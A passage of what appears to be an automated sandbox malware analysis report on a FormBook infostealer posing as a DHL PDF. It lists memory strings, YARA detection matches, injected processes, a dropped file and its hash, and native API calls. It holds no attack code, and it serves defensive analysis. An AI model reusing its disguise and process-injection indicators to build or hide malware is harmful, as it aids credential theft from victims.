          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
          Source: NETSTAT.EXE, 00000014.00000002.501270285.0000000000D98000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
          Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033f
          Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053CB

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\597OP970\597logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\597OP970\597logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419C90 NtCreateFile,4_2_00419C90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419D40 NtReadFile,4_2_00419D40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419DC0 NtClose,4_2_00419DC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419CE3 NtCreateFile,4_2_00419CE3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419C8B NtCreateFile,4_2_00419C8B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419DBA NtClose,4_2_00419DBA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059540 NtReadFile,LdrInitializeThunk,4_2_05059540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050595D0 NtClose,LdrInitializeThunk,4_2_050595D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059710 NtQueryInformationToken,LdrInitializeThunk,4_2_05059710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059780 NtMapViewOfSection,LdrInitializeThunk,4_2_05059780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050597A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_050597A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050596E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_050596E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_05059910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050599A0 NtCreateSection,LdrInitializeThunk,4_2_050599A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059840 NtDelayExecution,LdrInitializeThunk,4_2_05059840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059860 NtQuerySystemInformation,LdrInitializeThunk,4_2_05059860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A20 NtResumeThread,LdrInitializeThunk,4_2_05059A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A50 NtCreateFile,LdrInitializeThunk,4_2_05059A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059520 NtWaitForSingleObject,4_2_05059520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505AD30 NtSetContextThread,4_2_0505AD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059560 NtWriteFile,4_2_05059560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050595F0 NtQueryInformationFile,4_2_050595F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505A710 NtOpenProcessToken,4_2_0505A710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059730 NtQueryVirtualMemory,4_2_05059730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059760 NtOpenProcess,4_2_05059760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059770 NtSetInformationFile,4_2_05059770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505A770 NtOpenThread,4_2_0505A770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059FE0 NtCreateMutant,4_2_05059FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059610 NtEnumerateValueKey,4_2_05059610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059650 NtQueryValueKey,4_2_05059650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059660 NtAllocateVirtualMemory,4_2_05059660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059670 NtQueryInformationProcess,4_2_05059670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050596D0 NtCreateKey,4_2_050596D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059950 NtQueueApcThread,4_2_05059950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050599D0 NtCreateProcessEx,4_2_050599D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059820 NtEnumerateKey,4_2_05059820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505B040 NtSuspendThread,4_2_0505B040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050598A0 NtWriteVirtualMemory,4_2_050598A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050598F0 NtReadVirtualMemory,4_2_050598F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059B00 NtSetValueKey,4_2_05059B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505A3B0 NtGetContextThread,4_2_0505A3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A00 NtProtectVirtualMemory,4_2_05059A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A10 NtQuerySection,4_2_05059A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A80 NtOpenDirectoryObject,4_2_05059A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00D754E0 NtDelayExecution,4_2_00D754E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00D7318C NtWriteVirtualMemory,4_2_00D7318C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809B00 NtSetValueKey,LdrInitializeThunk,20_2_03809B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A50 NtCreateFile,LdrInitializeThunk,20_2_03809A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038099A0 NtCreateSection,LdrInitializeThunk,20_2_038099A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk,20_2_03809910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809840 NtDelayExecution,LdrInitializeThunk,20_2_03809840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809860 NtQuerySystemInformation,LdrInitializeThunk,20_2_03809860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809780 NtMapViewOfSection,LdrInitializeThunk,20_2_03809780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809FE0 NtCreateMutant,LdrInitializeThunk,20_2_03809FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809710 NtQueryInformationToken,LdrInitializeThunk,20_2_03809710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809770 NtSetInformationFile,LdrInitializeThunk,20_2_03809770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038096D0 NtCreateKey,LdrInitializeThunk,20_2_038096D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk,20_2_038096E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809610 NtEnumerateValueKey,LdrInitializeThunk,20_2_03809610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809650 NtQueryValueKey,LdrInitializeThunk,20_2_03809650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809660 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_03809660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038095D0 NtClose,LdrInitializeThunk,20_2_038095D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809540 NtReadFile,LdrInitializeThunk,20_2_03809540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809560 NtWriteFile,LdrInitializeThunk,20_2_03809560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380A3B0 NtGetContextThread,20_2_0380A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A80 NtOpenDirectoryObject,20_2_03809A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A00 NtProtectVirtualMemory,20_2_03809A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A10 NtQuerySection,20_2_03809A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A20 NtResumeThread,20_2_03809A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038099D0 NtCreateProcessEx,20_2_038099D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809950 NtQueueApcThread,20_2_03809950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038098A0 NtWriteVirtualMemory,20_2_038098A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038098F0 NtReadVirtualMemory,20_2_038098F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809820 NtEnumerateKey,20_2_03809820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380B040 NtSuspendThread,20_2_0380B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038097A0 NtUnmapViewOfSection,20_2_038097A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380A710 NtOpenProcessToken,20_2_0380A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809730 NtQueryVirtualMemory,20_2_03809730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809760 NtOpenProcess,20_2_03809760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380A770 NtOpenThread,20_2_0380A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809670 NtQueryInformationProcess,20_2_03809670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038095F0 NtQueryInformationFile,20_2_038095F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809520 NtWaitForSingleObject,20_2_03809520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380AD30 NtSetContextThread,20_2_0380AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9C90 NtCreateFile,20_2_00DE9C90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9DC0 NtClose,20_2_00DE9DC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9D40 NtReadFile,20_2_00DE9D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9E70 NtAllocateVirtualMemory,20_2_00DE9E70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9CE3 NtCreateFile,20_2_00DE9CE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9C8B NtCreateFile,20_2_00DE9C8B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9DBA NtClose,20_2_00DE9DBA
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_004069430_2_00406943
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_0040711A0_2_0040711A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100042CB2_2_100042CB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041D0284_2_0041D028
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041D8D14_2_0041D8D1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041BD624_2_0041BD62
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00402D884_2_00402D88
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00409E2C4_2_00409E2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00409E304_2_00409E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041E72D4_2_0041E72D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05010D204_2_05010D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050E1D554_2_050E1D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05036E304_2_05036E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0501F9004_2_0501F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050D10024_2_050D1002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0502B0904_2_0502B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0504EBB04_2_0504EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0388DBD220_2_0388DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03892B2820_2_03892B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037FEBB020_2_037FEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038922AE20_2_038922AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037E412020_2_037E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037CF90020_2_037CF900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038920A820_2_038920A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038928EC20_2_038928EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0388100220_2_03881002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0389E82420_2_0389E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037F20A020_2_037F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037DB09020_2_037DB090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03891FF120_2_03891FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037E6E3020_2_037E6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03892EF720_2_03892EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0388D61620_2_0388D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038925DD20_2_038925DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037C0D2020_2_037C0D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03892D0720_2_03892D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037DD5E020_2_037DD5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03891D5520_2_03891D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037F258120_2_037F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_037D841F20_2_037D841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0388D46620_2_0388D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DD2D9020_2_00DD2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DD2D8820_2_00DD2D88
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DEBD6220_2_00DEBD62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DD9E3020_2_00DD9E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DD9E2C20_2_00DD9E2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DD2FB020_2_00DD2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DEE72D20_2_00DEE72D
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll 18E86106E60613594527C85FE6C97287FC8C3715181A62CB2B4D2258C210B6C8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 037CB150 appears 35 times
          Source: DHL PACKAGE - PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DHL PACKAGE - PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
          Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/22@2/2
